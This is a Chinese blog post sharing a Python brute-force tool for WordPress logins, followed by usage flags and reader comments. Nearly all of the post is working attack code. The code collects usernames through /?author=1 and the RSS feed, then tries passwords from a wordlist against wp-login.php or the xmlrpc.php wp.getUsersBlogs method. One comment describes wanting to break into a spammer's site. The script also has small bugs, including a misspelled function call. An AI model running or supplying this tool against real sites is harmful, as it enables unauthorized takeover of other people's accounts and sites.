wordpress暴力破解python工具

wordpress暴力破解工具

1.参数化操作

2.内置两种暴力破解方式,通过wp-login模拟发包登录或者采用xmlrpc.php post数据包均可。

3.内置自动获取用户名功能。/?author=1 还有rss 两种方式获取。由于wp主题众多,匹配正则太少,所以会不准。配合百度爬虫试了一下效果,准确率70%。

4.同目录下新建pass.txt 就可以跑密码啦。

废话不多少,直接上代码!

#!/usr/bin/env python
#coding:utf-8
__author__ = 'mtfly'

import requests
import string
import time
import re
from optparse import OptionParser

def crack_xmlrpc(username, password, url):
	crack_url = url + "/xmlrpc.php"
	#print crack_url
	post = '''
		<?xml version="1.0" encoding="iso-8859-1"?>
		<methodCall>
  		<methodName>wp.getUsersBlogs</methodName>
  		<params>
   		<param><value>''' + username + '''</value></param>
   		<param><value>''' + password + '''</value></param>
  		</params>
		</methodCall>'''
	headers = {
		'UserAgent': 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)',
		'Referer': crack_url
	}
	try:
		res = requests.post(url=crack_url, data=post, headers=headers, timeout=5).content
		#print "ok"
	except Exception, e:
		print "error", e
	else:
		if '<int>405</int>' in res:
			print "XML-RPC has been disabled. Please use the wp-admin.php"
		elif "faultCode" in res:
			print "The password is not:", password
		elif "isAdmin" in res:
			print "\nThe password is ", password
			exit()

def crack_wp_login(username, password, url):
	crack_url = url + "/wp-login.php"
	#print crack_url
	headers = {
		'UserAgent': 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)',
		'Content-Type': 'application/x-www-form-urlencoded'
	}
	post = {'log': username, 'pwd': password}
	try:
		res = requests.post(url=crack_url, data=post, headers=headers, timeout=5).content
	except Exception, e:
		print "error", e
	else:
		if 'lostpassword' in res:
			print "The password is not:", password
		elif "welcome-panel" in res:
			print "\nThe password is ", password
			exit()

def get_author(url):
	get_url0 = url + "/?feed=rss2"
	get_url1 = url + "/?author=1"
	headers = {
		'UserAgent': 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)'
	}
	#print get_url
	try:
		res0 = requests.get(get_url0)
		res1 = requests.get(get_url1)
		html0 = res0.content
		html1 = res1.content
		s0 = re.findall('<dc:creator><\!\[CDATA\[(.*?)\]\]><\/dc:creator>',html0)
		s1 = re.findall('<title>(.*?)\s',html1)
		if len(s1) == 0:
			# print "null"
			# print res.url
			s1 = re.findall('author/(.*?)/', res1.url)
		s = s0 +s1
		print "The Username maybe:"
		for i in list(set(s)):
			print i
	except Exception, e:
		print e

p = OptionParser()
p.add_option('-u', '--url', type="string", help='Input the url')
p.add_option('-a', '--admin',default="admin", type="string", help='Input the username')
p.add_option('-g', '--getauthor',default=False, action="store_true", help='Get admin\'username')
p.add_option('-w', '--crack_wp_login',default=False, action="store_true", help='Crack by wp-login')
p.add_option('-x', '--crack_xmlrpc',default=False, action="store_true", help='Crack by xmlrpc')
options, args = p.parse_args()
url = options.url
admin = options.admin
author = options.getauthor
w = options.crack_wp_login
x = options.crack_xmlrpc

# url = "http://mtfly.net"
# url = "http://127.0.0.1/wp/"
print url
if author:
	get_author(url)
	exit()
f = open("pass.txt", "r")
for line in f:
	#print line.strip()
	if w:
		crack_wp_login(admin, line.strip(), url)
	if x:
		crack_xmlrpr(admin, line.strip(), url)
f.close

其实还可以加上多线程的功能,过两天再加上去吧。

使用方法:

新建pass.txt并且添加测试密码。

-u 后面接wp的url 记得带上http://

-a 后面跟用户名 默认是admin

-g 自动判断管理员用户名,准确率较低。获取用户名后自动退出。

-w 用 /wp-login.php 模拟后台网页登录

-x 用 /xmlrpc.php接口 POST登录


示例:

查看帮助

1

查询用户名

2

采用wp-login模拟登陆 破解密码 成功后自动停止运行

3

have fun!

4 comments on “wordpress暴力破解python工具

  1. 最近一直有个恶意网站在我的wordpress里刷链接评论。
    恼怒之下我点过去一看,哟呵,也是wordpress。动了邪念想黑进去干掉他,奈何是个win-server的虚机,wordpress自身的防御力又太好,攻不进去。

  2. 这个可以获取任意的用户名然后暴力破解密码吗?怎么看着只有获取管理员的密码?

Comments are closed.